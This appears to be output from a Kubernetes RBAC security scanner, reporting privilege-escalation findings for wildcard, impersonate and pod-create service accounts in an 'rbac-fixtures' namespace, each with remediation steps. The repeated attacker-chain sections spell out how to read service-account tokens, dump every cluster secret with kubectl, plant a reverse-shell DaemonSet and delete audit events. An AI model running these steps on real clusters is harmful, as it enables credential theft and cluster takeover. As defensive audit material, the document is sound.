Impact A single compromise of any pod mounting this SA grants full cluster control: read every Secret, exec into any pod, mutate RBAC, drain nodes, taint scheduling, install backdoor DaemonSets. Every API operation succeeds.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads using ServiceAccount/rbac-fixtures/sa-cluster-admin (or finds the token in any storage that touched it: backup, CI logs, a developer's kubeconfig).
  2. They kubectl auth can-i '*' '*' --all-namespaces --token=<stolen-token> and confirm full reach.
  3. They kubectl get secrets -A -o yaml to harvest all credentials cluster-wide (cloud IAM keys, registry pull secrets, application DB passwords, third-party SaaS API keys).
  4. They install a persistent foothold: a DaemonSet using a benign-looking image that runs an attacker reverse-shell on every node, plus a malicious mutating webhook with failurePolicy: Ignore so removal does not break clusters.
  5. They cover by deleting their own audit-log entries via kubectl delete events (allowed under */*) and rotating the SA's token to invalidate IR's existing copies.
Remediation
Replace the wildcard binding on ServiceAccount/rbac-fixtures/sa-cluster-admin with the smallest concrete role that satisfies the workload's actual needs. Treat the existing token as compromised.
  1. Identify the binding: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "ServiceAccount" and .name == "sa-cluster-admin" and .namespace == "rbac-fixtures")'.
  2. Generate a least-privilege role from the workload's actual API calls. Capture them with audit2rbac (https://github.com/liggitt/audit2rbac) over a representative window, or read the operator's source for the API verbs it issues.
  3. Create a Role/ClusterRole with the minimum verbs and bind it to ServiceAccount/rbac-fixtures/sa-cluster-admin. Verify with kubectl auth can-i for the actual operations the workload needs (and only those).
  4. Delete the wildcard binding and rotate the SA's token (delete and recreate the SA, or rely on projected SA token TTL). Audit-log review for the SA over the last 30 days to gauge possible misuse.
  5. Wire enforcement: a Kyverno cluster policy that fails any RoleBinding/ClusterRoleBinding granting verbs: ['*'] on resources: ['*'] to a non-system subject.
Evidence
Effective rules
* on *
via cluster-admin (binding crb-cluster-admin) (cluster scope)
* on
via cluster-admin (binding crb-cluster-admin) (cluster scope)
Show raw JSON
{
  "rules": [
    {
      "namespace": "",
      "resources": [
        "*"
      ],
      "source_binding": "crb-cluster-admin",
      "source_role": "cluster-admin",
      "verbs": [
        "*"
      ]
    },
    {
      "namespace": "",
      "resources": null,
      "source_binding": "crb-cluster-admin",
      "source_role": "cluster-admin",
      "verbs": [
        "*"
      ]
    }
  ],
  "workloads": null
}
CRITICAL ServiceAccount/rbac-fixtures/sa-wildcard Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-wildcard holds wildcard verbs on wildcard resources (cluster-admin equivalent)
Scope · Namespace ServiceAccount rbac-fixtures/sa-wildcard: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-wildcard Resource: ServiceAccount/rbac-fixtures/sa-wildcard

ServiceAccount ServiceAccount/rbac-fixtures/sa-wildcard is bound to a Role/ClusterRole that grants verbs: [*] on resources: [*] (and typically apiGroups: [*]). This is structurally indistinguishable from cluster-admin. Every API operation on every resource is authorized.

Aggregated rules:
- verbs [*] on resources [*] (from crb-wildcard/cr-wildcard in cluster-wide)

Wildcard-on-wildcard bindings are almost never the right design. They are typically the result of: (a) copy-pasting cluster-admin for an operator the team didn't have time to scope down; (b) a wildcard added "temporarily" during integration that never got rotated; (c) a third-party operator's installer that ships with */* and assumes the operator runs in a dedicated cluster. None of those reasons survive a security review, but the binding survives because there is no concrete reason to break it. CIS Kubernetes 5.1.1 / 5.1.2 explicitly call out wildcard-on-wildcard as a finding.

Workloads using this SA: Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app. Any compromise of any of those workloads (a single CVE, a poisoned container image, a leaked configuration file containing the SA token) becomes full cluster compromise immediately. There is no defense-in-depth left.

Impact A single compromise of any pod mounting this SA grants full cluster control: read every Secret, exec into any pod, mutate RBAC, drain nodes, taint scheduling, install backdoor DaemonSets. Every API operation succeeds.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads using ServiceAccount/rbac-fixtures/sa-wildcard (or finds the token in any storage that touched it: backup, CI logs, a developer's kubeconfig).
  2. They kubectl auth can-i '*' '*' --all-namespaces --token=<stolen-token> and confirm full reach.
  3. They kubectl get secrets -A -o yaml to harvest all credentials cluster-wide (cloud IAM keys, registry pull secrets, application DB passwords, third-party SaaS API keys).
  4. They install a persistent foothold: a DaemonSet using a benign-looking image that runs an attacker reverse-shell on every node, plus a malicious mutating webhook with failurePolicy: Ignore so removal does not break clusters.
  5. They cover by deleting their own audit-log entries via kubectl delete events (allowed under */*) and rotating the SA's token to invalidate IR's existing copies.
Remediation
Replace the wildcard binding on ServiceAccount/rbac-fixtures/sa-wildcard with the smallest concrete role that satisfies the workload's actual needs. Treat the existing token as compromised.
  1. Identify the binding: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "ServiceAccount" and .name == "sa-wildcard" and .namespace == "rbac-fixtures")'.
  2. Generate a least-privilege role from the workload's actual API calls. Capture them with audit2rbac (https://github.com/liggitt/audit2rbac) over a representative window, or read the operator's source for the API verbs it issues.
  3. Create a Role/ClusterRole with the minimum verbs and bind it to ServiceAccount/rbac-fixtures/sa-wildcard. Verify with kubectl auth can-i for the actual operations the workload needs (and only those).
  4. Delete the wildcard binding and rotate the SA's token (delete and recreate the SA, or rely on projected SA token TTL). Audit-log review for the SA over the last 30 days to gauge possible misuse.
  5. Wire enforcement: a Kyverno cluster policy that fails any RoleBinding/ClusterRoleBinding granting verbs: ['*'] on resources: ['*'] to a non-system subject.
Evidence
Effective rules
* on *
via cr-wildcard (binding crb-wildcard) (cluster scope)
Workloads
Pod/wildcard-app-85ff74597d-pr7l6 in namespace rbac-fixtures
Deployment/wildcard-app in namespace rbac-fixtures
Show raw JSON
{
  "rules": [
    {
      "namespace": "",
      "resources": [
        "*"
      ],
      "source_binding": "crb-wildcard",
      "source_role": "cr-wildcard",
      "verbs": [
        "*"
      ]
    }
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "wildcard-app-85ff74597d-pr7l6",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "Deployment",
      "name": "wildcard-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
CRITICAL

ServiceAccount ServiceAccount/rbac-fixtures/sa-impersonate is mounted by live workloads and has dangerous permissions: impersonate (cluster)

KUBE-SA-PRIVILEGED-002 4 subjects Score 10.0–8.3

Affected subjects (4)

CRITICAL ServiceAccount/rbac-fixtures/sa-impersonate Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-impersonate is mounted by live workloads and has dangerous permissions: impersonate (cluster)
Scope · Namespace ServiceAccount rbac-fixtures/sa-impersonate: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-impersonate Resource: ServiceAccount/rbac-fixtures/sa-impersonate

ServiceAccount ServiceAccount/rbac-fixtures/sa-impersonate carries one or more dangerous RBAC capabilities (impersonate (cluster)) *and* is actively mounted by workloads (Pod/rbac-fixtures/imp-app-5f78d6bb9d-xxx8k, Deployment/rbac-fixtures/imp-app). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive. The attacker does not need to find the SA token, because the pod is the SA token.

The flagged capabilities map directly to known privesc paths:
- secrets → read service-account tokens of higher-privileged SAs (KUBE-PRIVESC-005).
- create pods → mount any SA in a new pod, run as root, or set hostPath: / to escape (KUBE-PRIVESC-001, KUBE-ESCAPE-*).
- mutate workloads → modify a Deployment to swap its image / SA, gaining the workload's identity (KUBE-PRIVESC-003).
- bind roles / bind/escalate → grant yourself or any SA arbitrary permissions, cluster-wide (KUBE-PRIVESC-009, KUBE-PRIVESC-010).
- impersonate → assume any user/group/SA, instantly bypassing RBAC (KUBE-PRIVESC-008).
- nodes/proxy → kubelet API access to read all pod logs/exec on a node (KUBE-PRIVESC-012).

Workloads using this SA: Pod/rbac-fixtures/imp-app-5f78d6bb9d-xxx8k, Deployment/rbac-fixtures/imp-app. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.

Impact Compromise of any workload using ServiceAccount/rbac-fixtures/sa-impersonate immediately grants the listed dangerous capabilities. In practice, this is a one- or two-hop chain to cluster-admin equivalent (see correlated KUBE-PRIVESC-* findings on the same subject).
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads (Pod/rbac-fixtures/imp-app-5f78d6bb9d-xxx8k, Deployment/rbac-fixtures/imp-app) via RCE in the application, a malicious image layer, or a leaked manifest with embedded token.
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod.
  3. They use the token to invoke the dangerous capabilities (impersonate (cluster)) directly. The token already authenticates as ServiceAccount/rbac-fixtures/sa-impersonate, so no further escalation is needed.
  4. For each capability they convert into the matching privesc path: secrets→token theft → impersonate higher SA; bind→grant self cluster-admin; pods/create→privileged pod with hostPath /.
  5. Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain, typically cluster-admin if any privesc path connects.
Remediation
Split ServiceAccount/rbac-fixtures/sa-impersonate into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.
  1. Audit which of the workloads (Pod/rbac-fixtures/imp-app-5f78d6bb9d-xxx8k, Deployment/rbac-fixtures/imp-app) actually exercises each dangerous capability. Start with audit2rbac over a 7-day window, then ask the workload's owner to confirm.
  2. For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit-2rbac observed. Bind only that Role to the new SA.
  3. Migrate workloads to the new dedicated SA (set spec.serviceAccountName). Delete the bindings against the original ServiceAccount/rbac-fixtures/sa-impersonate and rotate its token.
  4. For capabilities that *no* workload actually exercises, delete the binding entirely.
  5. Wire enforcement: a Kyverno policy that warns when pods.spec.serviceAccountName references an SA whose RBAC binding includes any of [secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get].
Evidence
Workloads
Pod/imp-app-5f78d6bb9d-xxx8k in namespace rbac-fixtures
Deployment/imp-app in namespace rbac-fixtures
Dangerous permissionsimpersonate (cluster)
Show raw JSON
{
  "dangerous_permissions": [
    "impersonate (cluster)"
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "imp-app-5f78d6bb9d-xxx8k",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "Deployment",
      "name": "imp-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
CRITICAL ServiceAccount/rbac-fixtures/sa-wildcard Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-wildcard is mounted by live workloads and has dangerous permissions: secrets (cluster), create pods (cluster), mutate workloads (cluster), bind roles (cluster), bind/escalate (cluster), impersonate (cluster), nodes/proxy (cluster)
Scope · Namespace ServiceAccount rbac-fixtures/sa-wildcard: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-wildcard Resource: ServiceAccount/rbac-fixtures/sa-wildcard

ServiceAccount ServiceAccount/rbac-fixtures/sa-wildcard carries one or more dangerous RBAC capabilities (secrets (cluster), create pods (cluster), mutate workloads (cluster), bind roles (cluster), bind/escalate (cluster), impersonate (cluster), nodes/proxy (cluster)) *and* is actively mounted by workloads (Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive. The attacker does not need to find the SA token, because the pod is the SA token.

The flagged capabilities map directly to known privesc paths:
- secrets → read service-account tokens of higher-privileged SAs (KUBE-PRIVESC-005).
- create pods → mount any SA in a new pod, run as root, or set hostPath: / to escape (KUBE-PRIVESC-001, KUBE-ESCAPE-*).
- mutate workloads → modify a Deployment to swap its image / SA, gaining the workload's identity (KUBE-PRIVESC-003).
- bind roles / bind/escalate → grant yourself or any SA arbitrary permissions, cluster-wide (KUBE-PRIVESC-009, KUBE-PRIVESC-010).
- impersonate → assume any user/group/SA, instantly bypassing RBAC (KUBE-PRIVESC-008).
- nodes/proxy → kubelet API access to read all pod logs/exec on a node (KUBE-PRIVESC-012).

Workloads using this SA: Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.

Impact Compromise of any workload using ServiceAccount/rbac-fixtures/sa-wildcard immediately grants the listed dangerous capabilities. In practice, this is a one- or two-hop chain to cluster-admin equivalent (see correlated KUBE-PRIVESC-* findings on the same subject).
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads (Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app) via RCE in the application, a malicious image layer, or a leaked manifest with embedded token.
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod.
  3. They use the token to invoke the dangerous capabilities (secrets (cluster), create pods (cluster), mutate workloads (cluster), bind roles (cluster), bind/escalate (cluster), impersonate (cluster), nodes/proxy (cluster)) directly. The token already authenticates as ServiceAccount/rbac-fixtures/sa-wildcard, so no further escalation is needed.
  4. For each capability they convert into the matching privesc path: secrets→token theft → impersonate higher SA; bind→grant self cluster-admin; pods/create→privileged pod with hostPath /.
  5. Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain, typically cluster-admin if any privesc path connects.
Remediation
Split ServiceAccount/rbac-fixtures/sa-wildcard into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.
  1. Audit which of the workloads (Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app) actually exercises each dangerous capability. Start with audit2rbac over a 7-day window, then ask the workload's owner to confirm.
  2. For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit-2rbac observed. Bind only that Role to the new SA.
  3. Migrate workloads to the new dedicated SA (set spec.serviceAccountName). Delete the bindings against the original ServiceAccount/rbac-fixtures/sa-wildcard and rotate its token.
  4. For capabilities that *no* workload actually exercises, delete the binding entirely.
  5. Wire enforcement: a Kyverno policy that warns when pods.spec.serviceAccountName references an SA whose RBAC binding includes any of [secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get].
Evidence
Workloads
Pod/wildcard-app-85ff74597d-pr7l6 in namespace rbac-fixtures
Deployment/wildcard-app in namespace rbac-fixtures
Dangerous permissionssecrets (cluster)create pods (cluster)mutate workloads (cluster)bind roles (cluster)bind/escalate (cluster)impersonate (cluster)nodes/proxy (cluster)
Show raw JSON
{
  "dangerous_permissions": [
    "secrets (cluster)",
    "create pods (cluster)",
    "mutate workloads (cluster)",
    "bind roles (cluster)",
    "bind/escalate (cluster)",
    "impersonate (cluster)",
    "nodes/proxy (cluster)"
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "wildcard-app-85ff74597d-pr7l6",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "Deployment",
      "name": "wildcard-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
HIGH ServiceAccount/rbac-fixtures/sa-pod-create Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create is mounted by live workloads and has dangerous permissions: create pods (cluster)
Scope · Namespace ServiceAccount rbac-fixtures/sa-pod-create: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create Resource: ServiceAccount/rbac-fixtures/sa-pod-create

ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create carries one or more dangerous RBAC capabilities (create pods (cluster)) *and* is actively mounted by workloads (Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive. The attacker does not need to find the SA token, because the pod is the SA token.

The flagged capabilities map directly to known privesc paths:
- secrets → read service-account tokens of higher-privileged SAs (KUBE-PRIVESC-005).
- create pods → mount any SA in a new pod, run as root, or set hostPath: / to escape (KUBE-PRIVESC-001, KUBE-ESCAPE-*).
- mutate workloads → modify a Deployment to swap its image / SA, gaining the workload's identity (KUBE-PRIVESC-003).
- bind roles / bind/escalate → grant yourself or any SA arbitrary permissions, cluster-wide (KUBE-PRIVESC-009, KUBE-PRIVESC-010).
- impersonate → assume any user/group/SA, instantly bypassing RBAC (KUBE-PRIVESC-008).
- nodes/proxy → kubelet API access to read all pod logs/exec on a node (KUBE-PRIVESC-012).

Workloads using this SA: Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.

Impact Compromise of any workload using ServiceAccount/rbac-fixtures/sa-pod-create immediately grants the listed dangerous capabilities. In practice, this is a one- or two-hop chain to cluster-admin equivalent (see correlated KUBE-PRIVESC-* findings on the same subject).
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads (Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app) via RCE in the application, a malicious image layer, or a leaked manifest with embedded token.
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod.
  3. They use the token to invoke the dangerous capabilities (create pods (cluster)) directly. The token already authenticates as ServiceAccount/rbac-fixtures/sa-pod-create, so no further escalation is needed.
  4. For each capability they convert into the matching privesc path: secrets→token theft → impersonate higher SA; bind→grant self cluster-admin; pods/create→privileged pod with hostPath /.
  5. Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain, typically cluster-admin if any privesc path connects.
Remediation
Split ServiceAccount/rbac-fixtures/sa-pod-create into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.
  1. Audit which of the workloads (Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app) actually exercises each dangerous capability. Start with audit2rbac over a 7-day window, then ask the workload's owner to confirm.
  2. For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit-2rbac observed. Bind only that Role to the new SA.
  3. Migrate workloads to the new dedicated SA (set spec.serviceAccountName). Delete the bindings against the original ServiceAccount/rbac-fixtures/sa-pod-create and rotate its token.
  4. For capabilities that *no* workload actually exercises, delete the binding entirely.
  5. Wire enforcement: a Kyverno policy that warns when pods.spec.serviceAccountName references an SA whose RBAC binding includes any of [secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get].
Evidence
Workloads
Pod/daemon-app-vwsz7 in namespace rbac-fixtures
DaemonSet/daemon-app in namespace rbac-fixtures
Dangerous permissionscreate pods (cluster)
Show raw JSON
{
  "dangerous_permissions": [
    "create pods (cluster)"
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "daemon-app-vwsz7",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "DaemonSet",
      "name": "daemon-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
HIGH ServiceAccount/local-path-storage/local-path-provisioner-service-account Namespace 8.3
ServiceAccount ServiceAccount/local-path-storage/local-path-provisioner-service-account is mounted by live workloads and has dangerous permissions: create pods (local-path-storage)
Scope · Namespace ServiceAccount local-path-storage/local-path-provisioner-service-account: namespace-scoped subject; mounted by pods in local-path-storage
Category: Privilege Escalation Subject: ServiceAccount/local-path-storage/local-path-provisioner-service-account Resource: ServiceAccount/local-path-storage/local-path-provisioner-service-account

ServiceAccount ServiceAccount/local-path-storage/local-path-provisioner-service-account carries one or more dangerous RBAC capabilities (create pods (local-path-storage)) *and* is actively mounted by workloads (Pod/local-path-storage/local-path-provisioner-67b8995b4b-klv5x, Deployment/local-path-storage/local-path-provisioner). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive. The attacker does not need to find the SA token, because the pod is the SA token.

The flagged capabilities map directly to known privesc paths:
- secrets → read service-account tokens of higher-privileged SAs (KUBE-PRIVESC-005).
- create pods → mount any SA in a new pod, run as root, or set hostPath: / to escape (KUBE-PRIVESC-001, KUBE-ESCAPE-*).
- mutate workloads → modify a Deployment to swap its image / SA, gaining the workload's identity (KUBE-PRIVESC-003).
- bind roles / bind/escalate → grant yourself or any SA arbitrary permissions, cluster-wide (KUBE-PRIVESC-009, KUBE-PRIVESC-010).
- impersonate → assume any user/group/SA, instantly bypassing RBAC (KUBE-PRIVESC-008).
- nodes/proxy → kubelet API access to read all pod logs/exec on a node (KUBE-PRIVESC-012).

Workloads using this SA: Pod/local-path-storage/local-path-provisioner-67b8995b4b-klv5x, Deployment/local-path-storage/local-path-provisioner. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.

Impact Compromise of any workload using ServiceAccount/local-path-storage/local-path-provisioner-service-account immediately grants the listed dangerous capabilities. In practice, this is a one- or two-hop chain to cluster-admin equivalent (see correlated KUBE-PRIVESC-* findings on the same subject).
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads (Pod/local-path-storage/local-path-provisioner-67b8995b4b-klv5x, Deployment/local-path-storage/local-path-provisioner) via RCE in the application, a malicious image layer, or a leaked manifest with embedded token.
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod.
  3. They use the token to invoke the dangerous capabilities (create pods (local-path-storage)) directly. The token already authenticates as ServiceAccount/local-path-storage/local-path-provisioner-service-account, so no further escalation is needed.
  4. For each capability they convert into the matching privesc path: secrets→token theft → impersonate higher SA; bind→grant self cluster-admin; pods/create→privileged pod with hostPath /.
  5. Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain, typically cluster-admin if any privesc path connects.
Remediation
Split ServiceAccount/local-path-storage/local-path-provisioner-service-account into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.
  1. Audit which of the workloads (Pod/local-path-storage/local-path-provisioner-67b8995b4b-klv5x, Deployment/local-path-storage/local-path-provisioner) actually exercises each dangerous capability. Start with audit2rbac over a 7-day window, then ask the workload's owner to confirm.
  2. For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit-2rbac observed. Bind only that Role to the new SA.
  3. Migrate workloads to the new dedicated SA (set spec.serviceAccountName). Delete the bindings against the original ServiceAccount/local-path-storage/local-path-provisioner-service-account and rotate its token.
  4. For capabilities that *no* workload actually exercises, delete the binding entirely.
  5. Wire enforcement: a Kyverno policy that warns when pods.spec.serviceAccountName references an SA whose RBAC binding includes any of [secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get].
Evidence
Workloads
Pod/local-path-provisioner-67b8995b4b-klv5x in namespace local-path-storage
Deployment/local-path-provisioner in namespace local-path-storage
Dangerous permissionscreate pods (local-path-storage)
Show raw JSON
{
  "dangerous_permissions": [
    "create pods (local-path-storage)"
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "local-path-provisioner-67b8995b4b-klv5x",
      "namespace": "local-path-storage"
    },
    {
      "kind": "Deployment",
      "name": "local-path-provisioner",
      "namespace": "local-path-storage"
    }
  ]
}
HIGH

ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create is mounted by a DaemonSet, so its token lives on every node the DaemonSet schedules to

KUBE-SA-DAEMONSET-001 1 subject Score 9.4
MITRE ATT&CK: T1611T1552.007T1078.004

Affected subject

HIGH ServiceAccount/rbac-fixtures/sa-pod-create Cluster 9.4
ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create is mounted by a DaemonSet, so its token lives on every node the DaemonSet schedules to
Scope · Cluster ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create: DaemonSet places its token on every node in the cluster (or every node matching the DaemonSet's nodeSelector)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create Resource: ServiceAccount/rbac-fixtures/sa-pod-create

ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create is mounted by a DaemonSet (Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app). DaemonSets schedule one pod per matching node, so the kubelet projects this SA's token onto every one of those nodes. From an attacker's perspective, that turns any single node compromise (kernel CVE, runtime escape, host-mount-via-misconfigured-pod, malicious workload that escapes its sandbox) into immediate possession of the SA's identity, scaled by node count.

Aggregated rules: - verbs [create] on resources [pods] (from crb-pod-create/cr-pod-create in cluster-wide)

DaemonSet-mounted SAs are special-case for two reasons:
1. Distribution: a typical cluster has tens to thousands of nodes. The token is on each one, in /var/lib/kubelet/pods/<uid>/volumes/.... Any node compromise (including ones the security team would normally call "contained to one node") exfiltrates the same token, and rotating one node's token does not invalidate the others (until the next pod re-projection cycle, ~1h with default token TTL).
2. Privilege: DaemonSets are typically infrastructure agents (logging, monitoring, CNI, CSI, cluster-autoscaler) that legitimately need cluster-wide reads. So the SA tends to carry above-average permissions: nodes:get, pods:list, events:create, sometimes secrets:get for image-pull credentials. Combined with cluster-wide distribution this is a high-leverage credential.

Impact A single node compromise yields a token that authorizes whatever this SA's RBAC says, anywhere in the cluster. With DaemonSet-typical permissions (cluster-wide reads, sometimes node-level controls) this is a fast pivot from one host to cluster-wide visibility/influence.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises one node via a kernel CVE in a tenant workload, an outdated containerd, or a misconfigured pod with hostPath: / they were able to schedule there.
  2. From the host they read /var/lib/kubelet/pods/*/volumes/kubernetes.io~projected-volumes/token (the projected token of ServiceAccount/rbac-fixtures/sa-pod-create).
  3. They use the token from outside the cluster (kubectl --token=...). The token still works because projection-renewal does not invalidate already-extracted copies until the original expiration.
  4. They use the SA's RBAC for whatever it grants (typically nodes:get, pods:list, secrets:get for image pulls) to locate higher-value targets.
  5. Scale: every node has a copy. Cleanup is per-node, and the team typically only rotates the compromised node's token, leaving the same SA active on all the others.
Remediation
Tighten ServiceAccount/rbac-fixtures/sa-pod-create's RBAC to the literal minimum the DaemonSet needs, set short token TTL (expirationSeconds: 600) on the projected token, and treat the DaemonSet's image and host mounts as part of the SA's effective trust boundary.
  1. Audit ServiceAccount/rbac-fixtures/sa-pod-create's actual API calls with audit2rbac and pare the bindings down to the minimum verbs. Remove any secrets:get unless explicitly required for image pulls.
  2. In the DaemonSet pod template, project the token with expirationSeconds: 600 (10 min) instead of the default 1h. This caps the leak window for any single token theft.
  3. Audit the DaemonSet's container image and host mounts: a DaemonSet with hostPath: / is itself an escape primitive. Disallow privileged containers, hostPath, hostPID, hostNetwork in the DaemonSet's PodSpec.
  4. Add per-node detection: alert on kubectl create token <sa> invocations from outside expected control-plane subjects, and on usage of the SA's name from IPs that are not pod CIDR.
  5. If the DaemonSet does not actually need an API token, set automountServiceAccountToken: false on its PodSpec and on ServiceAccount/rbac-fixtures/sa-pod-create itself.
Evidence
Effective rules
create on pods
via cr-pod-create (binding crb-pod-create) (cluster scope)
Workloads
